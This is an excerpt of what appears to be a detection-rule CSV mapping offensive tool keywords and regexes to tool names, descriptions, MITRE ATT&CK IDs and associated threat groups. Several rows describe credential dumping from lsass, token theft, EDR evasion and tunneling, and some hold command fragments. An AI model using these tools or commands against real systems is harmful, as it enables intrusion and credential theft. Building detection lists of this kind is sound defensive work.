"* --threads * scan --buckets-file* ",".{0,1000}\s\-\-threads\s.{0,1000}\sscan\s\-\-buckets\-file.{0,1000}\s","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","N/A","8","10","2743","384","2025-04-21T14:44:23Z","2017-06-19T22:14:21Z","3518"
"* ticket_converter.py*",".{0,1000}\sticket_converter\.py.{0,1000}","offensive_tool_keyword","ticket_converter","A little tool to convert ccache tickets into kirbi (KRB-CRED) and vice versa based on impacket.","T1558.003 - T1110.004","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/zer1t0/ticket_converter","1","0","N/A","N/A","10","2","167","31","2022-06-16T19:38:05Z","2019-05-14T04:48:19Z","3519"
"* ticketConverter.py*",".{0,1000}\sticketConverter\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","3520"
"* ticketsplease.*",".{0,1000}\sticketsplease\..{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","N/A","1","72","9","2024-06-05T14:56:28Z","2021-11-04T15:30:12Z","3521"
"* TikiLoader*",".{0,1000}\sTikiLoader.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","N/A","10","10","761","139","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z","3522"
"* tls-alpn.nse*",".{0,1000}\stls\-alpn\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3524"
"* tls-nextprotoneg.nse*",".{0,1000}\stls\-nextprotoneg\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3525"
"* tls-ticketbleed.nse*",".{0,1000}\stls\-ticketbleed\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3526"
"* tmp_payload.txt*",".{0,1000}\stmp_payload\.txt.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","N/A","9","1","54","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z","3527"
"* tn3270-screen.nse*",".{0,1000}\stn3270\-screen\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3528"
"* to dump the masterkeys on the current machine from lsass.exe*",".{0,1000}\sto\sdump\sthe\smasterkeys\son\sthe\scurrent\smachine\sfrom\slsass\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#content","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","3530"
"* to retrieve secrets from machines that were previously SCCM clients*",".{0,1000}\sto\sretrieve\ssecrets\sfrom\smachines\sthat\swere\spreviously\sSCCM\sclients.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","SharpSCCM","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","3531"
"* to retrieve secrets from machines that were previously SCCM clients*",".{0,1000}\sto\sretrieve\ssecrets\sfrom\smachines\sthat\swere\spreviously\sSCCM\sclients.{0,1000}","offensive_tool_keyword","SharpSCCM","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","SharpSCCM","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","3532"
"* TokenFinder.py*",".{0,1000}\sTokenFinder\.py.{0,1000}","offensive_tool_keyword","TokenFinder","Tool to extract powerful tokens from Office desktop apps memory","T1003 - T1081 - T1110","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/doredry/TokenFinder","1","0","N/A","N/A","9","1","71","10","2024-03-01T14:27:34Z","2022-09-21T14:21:07Z","3533"
"* Token-Impersonation.ps1*",".{0,1000}\sToken\-Impersonation\.ps1.{0,1000}","offensive_tool_keyword","Token-Impersonation","Make a Token (local admin rights not required) or Steal the Token of the specified Process ID (local admin rights required)","T1134.001 - T1134.002","TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/Leo4j/Token-Impersonation","1","0","N/A","N/A","8","1","7","3","2024-03-20T17:07:13Z","2023-11-02T10:46:24Z","3534"
"* TokenStrip.c *",".{0,1000}\sTokenStrip\.c\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File to delete token privileges and lower the integrity level to untrusted for a specified process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nick-frischkorn/TokenStripBOF","1","0","N/A","N/A","10","10","44","7","2022-06-15T21:29:24Z","2022-06-15T02:13:13Z","3535"
"* TokenStripBOF.o *",".{0,1000}\sTokenStripBOF\.o\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File to delete token privileges and lower the integrity level to untrusted for a specified process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nick-frischkorn/TokenStripBOF","1","0","N/A","N/A","10","10","44","7","2022-06-15T21:29:24Z","2022-06-15T02:13:13Z","3536"
"* TokenUniverse.zip*",".{0,1000}\sTokenUniverse\.zip.{0,1000}","offensive_tool_keyword","TokenUniverse","An advanced tool for working with access tokens and Windows security policy.","T1134 - T1055 - T1056 - T1222 - T1484","TA0004 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/diversenok/TokenUniverse","1","0","N/A","N/A","8","6","597","66","2024-07-20T03:18:21Z","2018-06-22T21:02:16Z","3537"
"* tokenvator *",".{0,1000}\stokenvator\s.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","N/A","10","1038","201","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z","3538"
"* -Tokenvator -Command *",".{0,1000}\s\-Tokenvator\s\-Command\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","3539"
"* --top-ports 200 -sV -n -Pn --open --max-retries 2 --script vulners*",".{0,1000}\s\-\-top\-ports\s200\s\-sV\s\-n\s\-Pn\s\-\-open\s\-\-max\-retries\s2\s\-\-script\svulners.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","3540"
"* --tor *",".{0,1000}\s\-\-tor\s.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","0","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","3541"
"* tor deb.torproject.org-keyring*",".{0,1000}\stor\sdeb\.torproject\.org\-keyring.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","Black Basta","Defense Evasion","https://github.com/cmars/onionpipe","1","0","N/A","N/A","10","6","553","33","2025-04-22T16:34:56Z","2022-01-23T06:52:13Z","3542"
"* --tor_password *",".{0,1000}\s\-\-tor_password\s.{0,1000}","offensive_tool_keyword","adfsbrute","test credentials against Active Directory Federation Services (ADFS) allowing password spraying or bruteforce attacks","T1110.003 - T1110.001 - T1110","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/ricardojoserf/adfsbrute","1","0","N/A","N/A","8","2","172","33","2021-04-23T16:43:59Z","2020-10-02T16:28:35Z","3543"
"* tor-consensus-checker.nse*",".{0,1000}\stor\-consensus\-checker\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3544"
"* --tor-port*",".{0,1000}\s\-\-tor\-port.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","0","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","3545"
"* --tor-type*",".{0,1000}\s\-\-tor\-type.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","0","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","3546"
"* totalrecall.py*",".{0,1000}\stotalrecall\.py.{0,1000}","offensive_tool_keyword","TotalRecall","extracts and displays data from the Recall feature in Windows 11","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/xaitax/TotalRecall","1","0","N/A","N/A","10","10","2011","159","2024-06-08T09:25:08Z","2024-06-03T16:38:04Z","3547"
"* toteslegit.ps1*",".{0,1000}\stoteslegit\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","3548"
"* traceroute-geolocation.nse*",".{0,1000}\straceroute\-geolocation\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3549"
"* -tran <ConnectPort> <TransmitHost> <TransmitPort>*",".{0,1000}\s\-tran\s\<ConnectPort\>\s\<TransmitHost\>\s\<TransmitPort\>.{0,1000}","offensive_tool_keyword","htran","proxies connections through intermediate hops and aids users in disguising their true geographical location. It can be used by adversaries to hide their location when interacting with the victim networks","T1055 - T1090 - T1014","TA0003 - TA0005 - TA0011","N/A","GALLIUM - APT10 - APT12 - Deep Panda - MenuPass","C2","https://github.com/HiwinCN/Htran","1","0","#content","N/A","9","10","256","88","2021-04-25T09:57:46Z","2015-12-03T04:54:53Z","3550"
"* --transformer donut*",".{0,1000}\s\-\-transformer\sdonut.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","3551"
"* --transformer Loader*",".{0,1000}\s\-\-transformer\sLoader.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","3552"
"* --transformer pe2sh*",".{0,1000}\s\-\-transformer\spe2sh.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","3553"
"* --transformer sRDI*",".{0,1000}\s\-\-transformer\ssRDI.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","3554"
"* tricky.ps1*",".{0,1000}\stricky\.ps1.{0,1000}","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","0","N/A","N/A","N/A","2","114","33","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z","3555"
"* tricky.vbs*",".{0,1000}\stricky\.vbs.{0,1000}","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","0","N/A","N/A","N/A","2","114","33","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z","3556"
"* tricky2.ps1*",".{0,1000}\stricky2\.ps1.{0,1000}","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","0","N/A","N/A","N/A","2","114","33","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z","3557"
"* --trusted-for-delegation *",".{0,1000}\s\-\-trusted\-for\-delegation\s.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","3558"
"* TSCHRPCAttack*",".{0,1000}\sTSCHRPCAttack.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","3559"
"* tso-brute.nse*",".{0,1000}\stso\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3560"
"* tso-enum.nse*",".{0,1000}\stso\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3561"
"* tsunami.py*",".{0,1000}\stsunami\.py.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","3562"
"* tsunami_warning.py*",".{0,1000}\stsunami_warning\.py.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","3563"
"* tun2socks-darwin*",".{0,1000}\stun2socks\-darwin.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#linux","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","3564"
"* tun2socks-freebsd*",".{0,1000}\stun2socks\-freebsd.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","N/A","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","3565"
"* tun2socks-linux*",".{0,1000}\stun2socks\-linux.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#linux","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","3566"
